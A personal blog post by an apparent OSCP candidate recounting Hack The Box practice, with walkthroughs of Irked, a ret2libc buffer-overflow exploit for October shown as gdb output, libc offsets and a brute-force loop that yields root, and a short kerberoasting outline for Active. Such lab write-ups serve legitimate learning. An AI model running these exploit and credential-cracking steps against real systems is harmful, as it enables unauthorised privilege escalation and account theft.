Oscp sheeraz ali

The hardest CTF challenge I have ever played.

When I joined hack the box 6 months back I didn’t know what to do I was trying different machines and I was not able to compromise any.

played CTF’s before and won them but this was really new CTF challenges were easier than this. I am writing this in a OSCP prep context because that might be helpful for you to understand if I am ready for OSCP or not.

Why it was hard for me?

  1. The problem was I was individually learning how to use the tool’s but when it came to a network and getting a foothold on machines I failed miserably at it. privesc for me felt easier than getting an initial foothold on the machines on hack the box.
  2. Before hacking the box I never touched windows boxes in pentesting before so in starting it was hard for me to get windows privilege escalation and hard to follow and grasp concepts such as Active directory environment.
  3. Buffer overflow’s I did understand the concept of buffer overflow’s but practically reaching out and doing buffer overflow even with tutorials was super hard to understand. Especially all the register’s scared me.

What I tried and which worked but barely.

I planed to prepare for OSCP as advised by my seniors. I looked up on google how to prep for OSCP and I was on it for hours reading how to prepare. I got to know about vuln hub in 2018 and I started to solve machines on vulnhub machines that I first solved were all marked easy to name them they were

  1. Mr.robot
  2. Basic pentesting 1
  3. Basic Pentesting 2
  4. Derp and Stink
  5. Lin.security ( which was actually based on multiple ways to privesc )
  6. unknowndevice64: 2
  7. unknowndevice64: 1

then I learnt about over the wire and i solved there first and second machine. and then I thought I was pretty good but then again I also saw writeups for 4 of these machines out of all.

so I started hack the box 6 months back and the first machine i ever rooted was irked. which was active at that time, I took around more than 2-3 days to solve irked.

for solving irked I first did a port scan then I found

these services were running on the server. first thing I did in my methodology. was to do a version scan of ports and then search public exploits for the open service’s and it almost always worked on vulnhub. I also didn’t have an organized way of doing this at the time which didn’t work . so i tried enumerating the services. first one being

  1. HTTP which didn’t have anything on it but just a picture of an emoji
  2. SSH version was not vulnerable by any public exploit.
  3. Ureal IRC, however, was vulnerable but no service version available and searchsploit returned a ton of exploits. there was a Metasploit module and i didn’t use Metasploit because i cant in oscp but couldn’t exploit it.

i looked around and finally read about how to enumerate unrealIRC for the version number and found the vulnerable version number in the IRC chat application and then i tried and got an initial foothold on the system. Article that i used for finding version number and exploiting the service

after i got foothold i had problems uploading linenum at the time but i did it in temp and then ran it. didn’t find anything then i did manual enumeration and found a backup file that had a sting something that looked like a password i tried sudo as a user and supplied the password but it was wrong.

I looked more and more and used dirb against port 80 which didn’t found anything either.

then looking at the password like string it was written “super-elite steg password backup” and i thought maybe its steganography. i went on the server and downloaded that emoji image.

did steghide with that password and i got another password like string so i tried to ssh into the machine and i got in as DJMardov.

i uploaded linenum again in /tmp and found a binary with suid called /usr/bin/viewer. after some time i understood that this suid bit was executing something in the file /tmp/listusers which we have write permissions on so i rewrote it as !/bin/sh, and i ran /usr/bin/view user and i got root immediately.

What worked.

After not being able to solve any box successfully solving IRKED gave me a rush and i wanted to do more machines right away HELP was the second machine i tried.

I tried my techniques but after some time i was clueless on what to do and how to enumerate even what to enumerate. I tried for constant 3 times and the ways i tried to upload a shell as the image.php.png it eventually retired after some time and I waited for it to retire and i watched ippsec’s video on how he did it and turned out i didn’t think as i should have. my methodology was failing against all htb machines. i had a lot to learn a lot just watching ippsec’s video was not cutting it for me.

i made a new HTB Account and bought htb premium and my goal was to solve all the machines on hack the box. I started with lame and used ippsec’s videos as a means of learning and in almost every video. I solved over around 54 machines on Hack the box with ippsecs help i learnt 4-5 new thing’s that i didn’t know before with every machine i solved. so i started to maintain a file called learnt.md in every machine i solved in their respective folders.

apart from HTB, i started to learn 32bit assembly language course on the pentester academy for buffer overflow’s because i couldn’t wrap my head around registers. and then i did understand the concept of buffer overflows and i was practically able to do it

i solved buffer overflow machines on hack the box such as:

  1. October
  2. Node
  3. Sneaky
  4. etc

which had techniques like aslr brute-forcing and dep enabled. i also took pentester academy’s “exploiting simple buffer overflow on win 32” course solved all its exercise and then i took another course from cyber mentor solving vulnserver. I also solved Pheonix by exploit education. before oscp i plan to do protostar and complete Pheonix.

with hack the box, i made a new methodology and learnt more ways we can get the initial foothold on a system and how to Privesc and i also got buffer overflows down.

now the last challenge was about windows exploitation out of those 54 machines it was clear that i solved a lot of windows machines as well. so i had enough ideas about how to solve them. also, i did all the oscp like machines for windows and Linux which after 15 or so machines i found easy. The last machine i did which is active and is a windows machine is Heist and i found exploiting it pretty easy. I took pentester academies Attacking and Defending Active Directory which helped me a lot in understanding active directory and its different attack vectors enumeration and exploitation common and advanced red teaming for Windows AD environment. I understood many ways to privesc in a windows domain environment although i am still learning in this area quite a bit every day i have not yet completed this whole course i did perform kerberosting and silver & golden ticket attacks.

that’s how i am overcoming all these challenges that i had initially

Automating the manual

After solving all those machines solving them became a sort of easy job after i solved almost all medium and easy boxes. i have been up on exploring ways to automate the process of recon and enumeration as much as i can so i can focus on real stuff which needs my attention. Because OSCP only has 24 hours i have to automate almost everything i can. I also coded some python tools for my that can be found on my Github these were to practice some coding. i also wrote shell scripts to automate some manual things as well. which can be found in my other repo of all the machines from hack the box.

Tool’s i use for automation

My new methodology which works always (pretty much).

Initial Foot Hold

https://coggle.it/diagram/Xc22uIumpF-XkYEi/t/pentest-methodology?present=1https://coggle.it/diagram/Xc22uIumpF-XkYEi/t/pentest-methodology?present=1

these are the ways i try first to get an initial foothold now solving htb helped me a lot of building this understanding of how to we can get initial access to a system. please click on the link and see the coggle zoomed in and detailed.

Privesc

sagishahar/lpeworkshop

i use this guide as my reference for privesc its sagishahar/lpeworkshop guide and have worked for me for automating things i use above-mentioned tools in order to privesc i have also used Metasploit for privilege escalation.

Summery TLDR;

I have explained how the first machine i ever did on hack the box was very hard for me to do, i did it but my methods were all wrong to approach a target i have explained how i progressed form that one hard machine to solving all easy and almost all medium machines also tools i use to fasten up the process and to enumerate. I eventually got HACKER rank on hack the box and i am making my way through to elite hacker now. post have in detail’s what tools and techniques i used to solve the earlier explained problems such as buffer overflows, windows machines, getting initial access on the box.

PS:- Credits for all the images solving IRKED goes to hacking articles as the machine was retired and i can’t take screenshots of it anymore

More Technical details on buffer overflow challenges and windows challenges

Privesc for October

  1. found a file after privesc with suid /usr/local/bin/ovrflw
  2. on running the file it ask’s for a string
www-data@october:/usr/local/bin/$ ./ovrflw
Syntax: ./ovrflw <input string>

3. gave it an input of 1000 ‘A”s got a segmentation fault name was overflow so guessed it was overflow and we found segmentation fault 4. check for aslr to see if lib c’s address was changing from ippsecs

www-data@october:/home/harry$ cat /proc/sys/kernel/randomize_va_space 
2
www-data@october:/home/harry$ ldd /usr/local/bin/ovrflw | grep libc  
        libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb75b1000)
www-data@october:/home/harry$ ldd /usr/local/bin/ovrflw | grep libc
        libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb763b000)
www-data@october:/home/harry$ ldd /usr/local/bin/ovrflw | grep libc
        libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb7606000)

5. transferred the file with base64 and did checksec on overflw

root@kali# checksec ovrflw
[*] '/media/sf_CTFs/hackthebox/october-10.10.10.16/ovrflw'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)

NX means is enabled which means i cant run shellcode on the stack we have to do a return to lib c attack

we open the binary in gdb

root@kali# gdb -q ./ovrflw
Reading symbols from ./ovrflw...(no debugging symbols found)...done.
gdb-peda$

i create pattern to create a pattern of 500

gdb-peda$ pattern_create 500
'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%lA%QA%mA%RA%oA%SA%pA%TA%qA%UA%rA%VA%tA%WA%uA%XA%vA%YA%wA%ZA%xA%yA%zAs%AssAsBAs$AsnAsCAs-As(AsDAs;As)AsEAsaAs0AsFAsbAs1AsGAscAs2AsHAsdAs3AsIAseAs4AsJAsfAs5AsKAsgAs6A'
gdb-peda$ run 'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%lA%QA%mA%RA%oA%SA%pA%TA%qA%UA%rA%VA%tA%WA%uA%XA%vA%YA%wA%ZA%xA%yA%zAs%AssAsBAs$AsnAsCAs-As(AsDAs;As)AsEAsaAs0AsFAsbAs1AsGAscAs2AsHAsdAs3AsIAseAs4AsJAsfAs5AsKAsgAs6A'
[----------------------------------registers-----------------------------------]
EAX: 0x0 
EBX: 0x0 
ECX: 0xffffd3e0 ("As6A")
EDX: 0xffffd0fc ("As6A")
ESI: 0xf7f99000 --> 0x1d9d6c 
EDI: 0xf7f99000 --> 0x1d9d6c 
EBP: 0x6941414d ('MAAi')
ESP: 0xffffcf80 ("ANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8"...)
EIP: 0x41384141 ('AA8A')
EFLAGS: 0x10202 (carry parity adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
Invalid $PC address: 0x41384141
[------------------------------------stack-------------------------------------]
0000| 0xffffcf80 ("ANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8"...)
0004| 0xffffcf84 ("jAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA"...)
0008| 0xffffcf88 ("AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%"...)
0012| 0xffffcf8c ("AkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%O"...)
0016| 0xffffcf90 ("PAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA"...)
0020| 0xffffcf94 ("AAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%"...)
0024| 0xffffcf98 ("AmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%lA%Q"...)
0028| 0xffffcf9c ("RAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%lA%QA%mA"...)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x41384141 in ?? ()

crashed at 0x41384141 we use pattern_offset EIP: 0x41384141 ('AA8A')

gdb-peda$ pattern_offset AA8A
AA8A found at offset: 112
gdb-peda$ pattern_offset 0x41384141
1094205761 found at offset: 112

test run with offset

gdb-peda$ run `python -c 'print "A"*112 + "BBBB"'`
Stopped reason: SIGSEGV
0x42424242 in ?? ()

overfl ret to libc

we will find a libc reffernnce address for brute force later and finding offsets for /bin/sh

www-data@october:/dev/shm$ readelf -s /lib/i386-linux-gnu/libc.so.6 | grep -e " system@" -e " exit@"
   139: 00033260    45 FUNC    GLOBAL DEFAULT   12 exit@@GLIBC_2.0
  1443: 00040310    56 FUNC    WEAK   DEFAULT   12 system@@GLIBC_2.0
www-data@october:/dev/shm$ strings -a -t x /lib/i386-linux-gnu/libc.so.6 | grep "/bin/" 
 162bac /bin/sh
 164b10 /bin/csh

with this i have found base address for all we need to do is to exploit

exit: 0xb75f8000+0x33260 = 0xB762B260
system: 0xb75f8000+0x40310 = 0xB7638310
/bin/sh: = 0xb75f8000+0x162bac = 0xB775ABAC

we can not straight away do this because aslr is enabled

www-data@october:/dev/shm$ /usr/local/bin/ovrflw $(python -c 'print "\x90"*112 + "\x10\x83\x63\xb7" + "\x60\xb2\x62\xb7" + "\xac\xab\x75\xb7"');

we need to run it in a loop until bin/sh address matches because libc”s address is changing every time the program runs it’ll be able to find the right lib.c address and we get root

www-data@october:/dev/shm$ while true; do /usr/local/bin/ovrflw $(python -c 'print "\x90"*112 + "\x10\x83\x63\xb7" + "\x60\xb2\x62\xb7" + "\xac\xab\x75\xb7"'); done
*** Error in `/usr/local/bin/ovrflw': munmap_chunk(): invalid pointer: 0xbfeeae83 ***
Aborted (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (cre dumped)
Illegal instruction (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
# id
uid=33(www-data) gid=33(www-data) euid=0(root) groups=0(root),33(www-data)
# cat /root/root.txt
6bcb9cff...

I found ret to lib c attack hard in this but i learnt how the offset works and how lib c address changes and thats why it is now easy

Hardest Windows CTF

hardest windows machine i did for oscp was kerberoasting

i found this file in the smb enumeration phase catting it was this

\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\

then decrypted gpp password and got user by

smbclient //10.10.10.100/Users -U SVC_TGS
then i used impackets getuserspn.py with our user to get administrator’s ticket then cracked it with hashcat and then used impackets psexec.py to get admin access

i solved this by understanding about kerberoasting which is:
Kerberos is one of the most used protocol for maintaining authentication & authorization in an environment. Everything is done through tickets & can be described as follows:-

1) Authentication (or Ticket Granting Ticket)
2) Authorization (or Ticket Granting Service)

In kerberos environment, if we want to access (let’s say FTP service running on server C) first we need a valid TGT. A domain user NTLM hash encrypted with the current user timestamp is sent to the Domain Controller.
If the DC verifies the resources, a valid TGT is granted to the domain user. A TGS will then be requested by the domain user & based on the privileges of the user TGS would then br granted.

Once the domain user have the TGS (of the service “FTP” running on server C), bruteforcing can then be performed & this procedure can then be called as kerberoasting.

please refer to this writeup don’t want to make this too long for more info also check out my git repo for files and things i used for this machine

https://0xrick.github.io/hack-the-box/active/
Posts created 29

2 thoughts on “The hardest CTF challenge I have ever played.

Leave a Reply

Your email address will not be published. Required fields are marked *

Related Posts

Begin typing your search term above and press enter to search. Press ESC to cancel.

Back To Top